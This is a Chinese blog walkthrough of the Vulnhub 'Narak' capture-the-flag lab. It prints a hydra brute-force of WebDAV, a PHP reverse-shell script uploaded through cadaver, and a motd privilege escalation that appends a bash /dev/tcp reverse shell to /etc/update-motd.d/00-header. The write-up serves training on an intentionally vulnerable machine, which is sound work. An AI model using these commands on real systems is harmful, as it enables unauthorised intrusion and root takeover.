narak靶机攻略

最新推荐文章于 2024-11-26 23:45:00 发布
最新推荐文章于 2024-11-26 23:45:00 发布
阅读量178 收藏 1
点赞数
分类专栏: 靶机系列 文章标签: python linux 开发语言 web安全 安全 网络 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58683895/article/details/134150706
版权

narak靶机攻略

扫描

image-20231031205540225

image-20231031205601240

image-20231031205619177

渗透

cewl http://10.4.7.158 > use1.txt

hydra -L use1.txt -P use1.txt http-get://10.4.7.158/webdav -V -t 50 -f

image-20231031212051020

yamdoot:Swarg

cadaver http://10.4.7.158/webdav

image-20231031212319370

<?php
$ip='10.4.7.158';
$port=12138;
$sock = fsockopen($ip, $port);
$descriptorspec = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open('/bin/sh ' , $descriptorspec,$pipes);
proc_close($process);

写一个php反弹shell

然后使用cadaver上传

image-20231031214241057

上传过后发现该文件

image-20231031214332316

kali监听,然后连接成功

使用python3获取回显

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20231031214512984

看到一个flag

image-20231031214713054

识别一下里面的字符,发现是md5

image-20231031214842438

解密一下

解不出来一点

在mnt下发现一个密码文件

image-20231031215407053

这一看就是brainfuck

--[----->+<]>---.+++++.+.+++++++++++.--.+++[->+++<]>++.++++++.--[--->+<]>--.-----.++++.

解密之后为chitragupt

这目录下还有一个密码文件

image-20231031215557310

解密为yamdoot:Swarg,就是登录web的账号密码

看一下/etc/passwd,有三个登录用户

image-20231031215830214

用刚才解密出来的疑似密码的试试登录

提权

最终发现inferno可以登录

image-20231031220201906

常规提权无果

筛选一下root可执行文件

find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null

image-20231031220644931

在Linux中,/etc/update-motd.d目录下的脚本和程序是以root用户的身份运行的。

/etc/motd是一个文本文件,用于在用户登录系统时显示一条消息。该消息通常用于向用户提供系统的重要信息、公告、警告或其他相关通知

理论上修改 motd 下的任何文件都可,提权时通常修改 /etc/update-motd.d/00-header 文件

echo "bash -c 'bash -i >& /dev/tcp/10.4.7.138/6789 0>&1'" >> /etc/update-motd.d/00-header

image-20231031221723147

将该命令写入,随后重进ssh

登录过后获取root

image-20231031221847736

image-20231031221915791

order libra
关注
专栏目录
Vulnhub:narak靶机练习教程
m0_74887243的博客
05-13 235
使用dirb扫描网页目录,发现了webdav的路径,访问需要用户名和密码。目标:找到两个flag:user.txt root.txt。靶机22端口开启ssh服务;80端口开启http服务。使用kali自带的字典生成工具,从网页上爬取信息。访问靶机ip查看网页源代码,没有太大帮助。将webshell上传到webdav。使用ssh的登陆inferno。攻击机和靶机都使用net模式。使用nmap扫描到靶机ip。找到上传路径,上传成功。
靶机narak
weixin_50339323的博客
08-04 1683
靶机网址:https://www.vulnhub.com/entry/ha-narak,569/ 目录 一、信息搜集: 二、漏洞利用与探测: 三、提权 一、信息搜集: 获取IP: nmap -sP 192.168.8.0/24 端口扫描: nmap -sV -p- -sC 192.168.8.132 -n -vv 22、80端口均开启 访问192.168.8.132 从页面搜索信息 · 翻译了一下网页内容信息提取关键字或许有用: yamdoot,...
narak靶机
2303_79608809的博客
08-02 1013
目前我们还没有找到关键的突破点,所以我们下一步需要从扫描目录的点着手。在本次实验中,需要对在不断尝试的过程的靶机的信息足够熟悉并进行一定的猜测,比如:要对creds.txt这个加密文件进行base64解密后得到的明文联想到这可能是/webdav的登录的账号和密码,否则后续的一切渗透流程都很难展开。我们在/home家目录下,看到三个用户,然后在/etc/passwd文件下,看到具有/bin/bash权限的用户,也刚好有这几个,很有可能这几个账户中就有和刚才chitragupt密码匹配ssh的用户。
Narak靶机渗透
weixin_56306210的博客
01-31 563
Narak靶机渗透
VulnHub-Narak靶机笔记
LINGX5的博客
09-21 1448
Narak是一台Vulnhub的靶机,其中有简单的tftp和webdav的利用,以及motd文件的一些知识。
narak靶机打靶过程及思路
qq_52610024的博客
05-19 339
使用hydra进行爆破hydra-Ldict.txt-Pdict.txt10.1.8.133http-get/webdav-v后面的意思是使用http。继续查找文件find/-typef-userroot-perm-ug=x,o=w-execls-l‘{}’;上传反弹shell的php文件/usr/share/webshells/php/php-reverse-shell.php。使用CVE-2021-3493漏洞进行提权,提权成功拿下root账号。...
Narak靶机打靶过程
qq_64703089的博客
08-03 970
Narak发布日期:23 Sep 2020tips1、目录扫描记得扫 txt、备份文件等2、爆破无果,可以自己通过页面单词整理一份字典3、端口扫描 TCP要是打不进去,看看UDP。
narak靶机总结
weixin_51692662的博客
11-06 721
webdav、narak靶机、motd提权
narak 靶机实验实战演练
lianliandad的博客
08-02 1181
仅供学习借鉴
红队打靶:Narak靶机思路讲解(vulnhub)
qq_73413340的博客
08-25 1278
我记得vulnhub的页面对于这个靶机的描述中有这样一句话: 燃烧的墙壁和恶魔无处不在,即使你最信任的工具也会在这次任务中背叛你。不要相信任何人。截至目前,我们用到了哪些工具呢?用nmap进行了主机发现和端口扫描,用gobuster进行了目录爆破。那会不会是我们被工具“背叛”了呢?莫非实际的结果并不是工具显示的那样?先说gobuster,我们进行web目录爆破可以用很多工具,其实没有本质区别,关键还是字典的问题,因此应该不是爆破工具的问题。莫非是nmap端口扫描的结果有误或者遗漏了什么?比如有可能遗漏了某些
vulunhub靶机——narak测试思路
hxh108的博客
06-22 882
1、下载好narak靶机之后,在VM虚拟机中打开,设置网络连接为nat模式,同时设置kali同样为nat模式。
靶机练习 narak ,个人学习心得
09-08
靶机练习 NARAK,个人学习心得 靶机练习 靶机练习是渗透测试的重要组成部分,它可以帮助我们检测系统中的安全漏洞和脆弱性。在这个练习中,我们使用的靶机NARAK,并且通过渗透测试来获取 Flag。 探测靶机 IP ...
VulnHub narak
weixin_45682839的博客
10-21 1256
涉及知识包括:主机存活探测、端口服务探测、WEB信息搜集、WEB爆破专用字典生成、暴力破解、webdav PUT上传、linux本地提权、Brainfuck加解密、motd文件注入提权等。
python操作Elasticsearch
a961634066的博客
11-25 281
使用elasticsearch 6.x版本,操作es数据。
python系列】python数据类型之集合
学习学习再学习
11-23 965
python常用数据类型之集合
使用Node2Vec进行知识图谱嵌入的详细教程
Y-starrydreamer的博客
11-26 643
Node2Vec 是一种用于将图的节点嵌入到向量空间的方法。其思想来源于Word2Vec,即使用随机游走技术生成节点序列,然后利用这些序列训练嵌入模型。Node2Vec 结合了DFS(深度优先搜索)和BFS(广度优先搜索),能够在图中同时捕捉局部和全局的结构信息。通过本文的介绍,读者应该对 Node2Vec 的原理和应用有了较为全面的了解。在知识图谱嵌入的实际应用中,Node2Vec 提供了一种灵活且有效的解决方案。通过合适的参数调节,Node2Vec 可以在全局和局部信息的平衡中生成高质量的节点嵌入。
图论入门编程
最新发布
Rain
11-26 82
【代码】图论入门编程。
Python语法基础(一)
in_seattle的博客
11-26 422
在这个函数的定义当中,我们在形参中,对age和address进行了赋值,这样做的好处是,即使我们传入的参数小于三个,这个函数仍然可以成立。我们前面说函数和变量是很类似的,与给函数赋值和给变量赋值,结果也是极其相似的,我们来看一下给变量的赋值。这个代码是会报错的,因为func1中的变量在func2中是无法直接使用的,因为两个的作用域并不相同。闭包的前提是函数的嵌套定义,在内部函数当中使用了外部函数的变量。首先,在上面的这个嵌套定义的代码中,执行结果是这样的。是运行不起来的,因为这个时候它的类型发生了改变。
Python内置函数
2401_85737078的博客
11-23 520
compile(source, filename, mode, flags=0, dont_inherit=False, optimize=-1): 将源代码编译为代码对象,可以指定编译模式(exec, eval, single)。slice(start, stop[, step]): 返回一个表示由 range(start, stop, step) 指定索引集的 slice 对象。pow(x, y, z=None): 返回 x 的 y 次幂,如果 z 存在,则返回 x 的 y 次幂对 z 取模的结果。
【论文复现】transformer
EterNity_TiMe_的计算机学习之路
11-24 659
Transformer模型是由谷歌在2017年提出并首先应用于机器翻译的神经网络模型结构。为了解决在处理长距离依赖关系时存在一些限制,同时也不易并行化,导致训练速度缓慢的问题,
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值